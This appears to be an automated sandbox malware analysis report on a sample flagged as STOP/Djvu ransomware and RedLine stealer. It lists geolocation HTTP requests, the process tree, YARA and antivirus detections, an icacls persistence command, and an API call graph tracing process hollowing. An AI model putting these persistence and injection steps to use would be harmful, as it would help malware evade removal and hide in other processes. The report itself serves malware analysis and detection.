                              2024-08-26 21:31:15 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                              2024-08-26 21:31:15 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.649716188.114.97.34436408C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 21:31:17 UTC85OUTGET /geo.json HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: api.2ip.ua
                              2024-08-26 21:31:17 UTC889INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 21:31:17 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              strict-transport-security: max-age=63072000; preload
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              x-xss-protection: 1; mode=block; report=...
                              access-control-allow-origin: *
                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m9UtSW4g2SmYaS7Huf0CWSQbkH7Qk93js6etjw%2FceML6%2BqsXy3b7K2aoIUs2cF%2BJjos80NvU0cYtf84juVz3gBRZdgNdbv4aiaB6W42EJR3l1HPSL7yjwwLrHHsw"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b96ed87ff2141a9-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-26 21:31:17 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                              2024-08-26 21:31:17 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.652636188.114.97.34436292C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 21:31:27 UTC85OUTGET /geo.json HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: api.2ip.ua
                              2024-08-26 21:31:27 UTC893INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 21:31:27 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              strict-transport-security: max-age=63072000; preload
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              x-xss-protection: 1; mode=block; report=...
                              access-control-allow-origin: *
                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TNDfMSR%2BqeW427ipbORtoOHrE4dG1FkAjQg%2BxByBvQJSrDEo6jc9X1BdM51%2B41lRsnVqpn1NLAZY%2FebImJvQGZj1okuOZ1WdDehmooN748PKQEKynBBUbYvP%2Bixu"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b96edc6bd84190a-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-26 21:31:27 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                              2024-08-26 21:31:27 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.652638188.114.97.34431492C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 21:31:34 UTC85OUTGET /geo.json HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: api.2ip.ua
                              2024-08-26 21:31:34 UTC889INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 21:31:34 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              strict-transport-security: max-age=63072000; preload
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              x-xss-protection: 1; mode=block; report=...
                              access-control-allow-origin: *
                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tzltbxw7TwBhqtz0ijWiksnu7l2NPQ2k5huK%2FngtfWoG77vEjRxyWW1sjzifh1zTXEK5%2BTIXV5NF5li%2Fs9rIRoZOCvOH728z4X4tP6jrlPNGIr3sZO6XDzBivuAq"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b96edf3a9166a52-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-26 21:31:34 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                              2024-08-26 21:31:34 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:17:31:02
                              Start date:26/08/2024
                              Path:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\tsnsd8pOvn.exe"
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:17:31:06
                              Start date:26/08/2024
                              Path:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\tsnsd8pOvn.exe"
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              Target ID:4
                              Start time:17:31:08
                              Start date:26/08/2024
                              Path:C:\Windows\SysWOW64\icacls.exe
                              Wow64 process (32bit):true
                              Commandline:icacls "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                              Imagebase:0x340000
                              File size:29'696 bytes
                              MD5 hash:2E49585E4E08565F52090B144062F97E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:17:31:08
                              Start date:26/08/2024
                              Path:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTask
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2213957997.0000000002164000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:6
                              Start time:17:31:09
                              Start date:26/08/2024
                              Path:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2240762289.0000000002088000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 87%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:7
                              Start time:17:31:13
                              Start date:26/08/2024
                              Path:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTask
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:false

                              Target ID:8
                              Start time:17:31:15
                              Start date:26/08/2024
                              Path:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:false

                              Target ID:10
                              Start time:17:31:21
                              Start date:26/08/2024
                              Path:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.2339633794.0000000002147000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:11
                              Start time:17:31:25
                              Start date:26/08/2024
                              Path:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              Target ID:12
                              Start time:17:31:29
                              Start date:26/08/2024
                              Path:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.2413321844.000000000067E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:13
                              Start time:17:31:33
                              Start date:26/08/2024
                              Path:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              Reset < >

                                Execution Graph

                                Execution Coverage:1.1%
                                Dynamic/Decrypted Code Coverage:22.6%
                                Signature Coverage:43.5%
                                Total number of Nodes:168
                                Total number of Limit Nodes:20
                                execution_graph 53987 402020 53990 40c120 53987->53990 53989 40202a 53991 40c161 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 53990->53991 53992 40c142 53990->53992 53994 40c1c3 53991->53994 53992->53991 53993 40c14e 53992->53993 53993->53989 53994->53993 53995 2210000 53998 2210630 53995->53998 53997 2210005 53999 221064c 53998->53999 54001 2211577 53999->54001 54004 22105b0 54001->54004 54007 22105dc 54004->54007 54005 22105e2 GetFileAttributesA 54005->54007 54006 221061e 54007->54005 54007->54006 54009 2210420 54007->54009 54010 22104f3 54009->54010 54011 22104fa 54010->54011 54012 22104ff CreateWindowExA 54010->54012 54011->54007 54012->54011 54013 2210540 PostMessageA 54012->54013 54014 221055f 54013->54014 54014->54011 54016 2210110 VirtualAlloc GetModuleFileNameA 54014->54016 54017 2210414 54016->54017 54018 221017d CreateProcessA 54016->54018 54017->54014 54018->54017 54020 221025f VirtualFree VirtualAlloc Wow64GetThreadContext 54018->54020 54020->54017 54021 22102a9 ReadProcessMemory 54020->54021 54022 22102e5 VirtualAllocEx NtWriteVirtualMemory 54021->54022 54023 22102d5 NtUnmapViewOfSection 54021->54023 54024 221033b 54022->54024 54023->54022 54025 2210350 NtWriteVirtualMemory 54024->54025 54026 221039d WriteProcessMemory Wow64SetThreadContext ResumeThread 54024->54026 54025->54024 54027 22103fb ExitProcess 54026->54027 54029 2178026 54030 2178035 54029->54030 54033 21787c6 54030->54033 54036 21787e1 54033->54036 54034 21787ea CreateToolhelp32Snapshot 54035 2178806 Module32First 54034->54035 54034->54036 54037 2178815 54035->54037 54038 217803e 54035->54038 54036->54034 54036->54035 54040 2178485 54037->54040 54041 21784b0 54040->54041 54042 21784c1 VirtualAlloc 54041->54042 54043 21784f9 54041->54043 54042->54043 54043->54043 54044 4020b5 54045 4020c1 _check_managed_app 54044->54045 54070 40d700 HeapCreate 54045->54070 54049 4020d9 54051 4020ec __RTC_Initialize 54049->54051 54153 402220 GetModuleHandleW GetProcAddress ExitProcess ___crtExitProcess 54049->54153 54077 40d1e0 GetStartupInfoA 54051->54077 54053 40210a 54090 40d1d0 GetCommandLineW 54053->54090 54055 40211d 54091 40d120 GetEnvironmentStringsW 54055->54091 54059 402131 54099 40cb90 54059->54099 54061 402144 54104 40c260 54061->54104 54063 402159 __wwincmdln 54110 41f450 54063->54110 54066 4021b7 54155 40c340 75 API calls _doexit 54066->54155 54069 4021bc 54071 40d72e __heap_init 54070->54071 54072 4020cb 54070->54072 54071->54072 54073 40d741 54071->54073 54072->54049 54152 402220 GetModuleHandleW GetProcAddress ExitProcess ___crtExitProcess 54072->54152 54156 40e9c0 HeapAlloc 54073->54156 54075 40d74b 54075->54072 54076 40d752 HeapDestroy 54075->54076 54076->54072 54085 40d25b 54077->54085 54078 40d27c 54078->54053 54079 40d65b SetHandleCount 54079->54078 54080 40d513 54080->54079 54081 40d57e GetStdHandle 54080->54081 54089 40d60c 54080->54089 54082 40d598 54081->54082 54081->54089 54083 40d5a2 GetFileType 54082->54083 54082->54089 54084 40d5b5 54083->54084 54083->54089 54158 418030 InitializeCriticalSectionAndSpinCount 54084->54158 54085->54078 54085->54080 54086 40d4a1 GetFileType 54085->54086 54157 418030 InitializeCriticalSectionAndSpinCount 54085->54157 54086->54085 54089->54078 54089->54079 54090->54055 54092 402127 54091->54092 54093 40d13e 54091->54093 54097 40cd30 GetModuleFileNameW 54092->54097 54094 40d1a4 _memcpy_s 54093->54094 54095 40d196 FreeEnvironmentStringsW 54093->54095 54096 40d1b5 FreeEnvironmentStringsW 54094->54096 54095->54092 54096->54092 54098 40cd63 _wparse_cmdline ___wsetargv 54097->54098 54098->54059 54100 40cbad 54099->54100 54102 40cbb5 _wcslen 54099->54102 54100->54061 54102->54100 54159 412510 16 API calls 2 library calls 54102->54159 54160 4050f0 10 API calls __invoke_watson 54102->54160 54107 40c26f __IsNonwritableInCurrentImage 54104->54107 54106 40c292 __initterm_e 54109 40c2ad __IsNonwritableInCurrentImage __initterm 54106->54109 54166 4024a0 56 API calls _atexit 54106->54166 54161 4149e0 54107->54161 54109->54063 54111 41f45d ___crtMessageWindowW 54110->54111 54112 41f522 54111->54112 54113 41f46c lstrlenA 54111->54113 54117 41f573 54112->54117 54119 41f58b GlobalAlloc GetOverlappedResult GetLastError 54112->54119 54113->54112 54114 41f482 GetWindowInfo 54113->54114 54115 41f4b3 _memset 54114->54115 54185 41f0e0 51 API calls __vswprintf_c_l 54115->54185 54120 41f5de GetFileAttributesW SearchPathW GetProfileStringW 54117->54120 54123 41f623 54117->54123 54118 41f4cf 54186 4017c0 19 API calls _vwscanf 54118->54186 54119->54112 54120->54117 54121 41f682 GetModuleHandleA GetProcAddress 54168 41ec70 LocalAlloc 54121->54168 54123->54121 54126 41f66a ExitProcess 54123->54126 54124 41f4df 54187 401460 MoveFileA GetLastError __dosmaperr 54124->54187 54128 41f4eb 54188 401f40 30 API calls __wcstoi64 54128->54188 54130 41f4f5 54189 401f60 56 API calls __realloc_dbg 54130->54189 54131 41f6e0 WriteConsoleA GetProcessPriorityBoost 54132 41f6ad 54131->54132 54132->54131 54136 41f701 54132->54136 54133 41f79d 54139 41f7d2 GetPrivateProfileIntA GetSystemDefaultLangID GetUserDefaultLCID SetVolumeLabelW WaitForMultipleObjects 54133->54139 54140 41f7a9 54133->54140 54143 41f812 54133->54143 54135 41f731 SetFileApisToANSI 54135->54136 54136->54133 54136->54135 54138 41f75b OpenSemaphoreW SetSystemTime 54136->54138 54137 41f501 _realloc 54190 401010 18 API calls 4 library calls 54137->54190 54138->54136 54139->54140 54140->54133 54191 41ed40 16 API calls 54140->54191 54144 41f845 OpenMutexW 54143->54144 54148 41f853 54143->54148 54144->54143 54145 41f51f 54145->54112 54146 41f90f 54170 41f210 54146->54170 54148->54146 54151 41f895 SystemTimeToTzSpecificLocalTime GetTimeZoneInformation MoveFileW 54148->54151 54169 41ec90 lstrcpyA GetProcAddress VirtualProtect 54148->54169 54151->54148 54152->54049 54153->54051 54154 40c300 75 API calls _doexit 54154->54066 54155->54069 54156->54075 54157->54085 54158->54089 54159->54102 54160->54102 54162 4149f8 54161->54162 54163 414a1d 54162->54163 54164 4149ef 54162->54164 54163->54106 54164->54162 54167 406520 6 API calls __crt_wait_module_handle 54164->54167 54166->54109 54167->54164 54168->54132 54169->54148 54172 41f21d ___crtMessageWindowW 54170->54172 54171 41f2ba 54192 41f100 54171->54192 54172->54171 54174 41f268 GetLastError 54172->54174 54175 41f248 GetConsoleFontSize DisconnectNamedPipe GetLocalTime 54172->54175 54174->54172 54176 41f27a GetCommandLineW OpenWaitableTimerW WritePrivateProfileStructA ScrollConsoleScreenBufferW 54174->54176 54175->54174 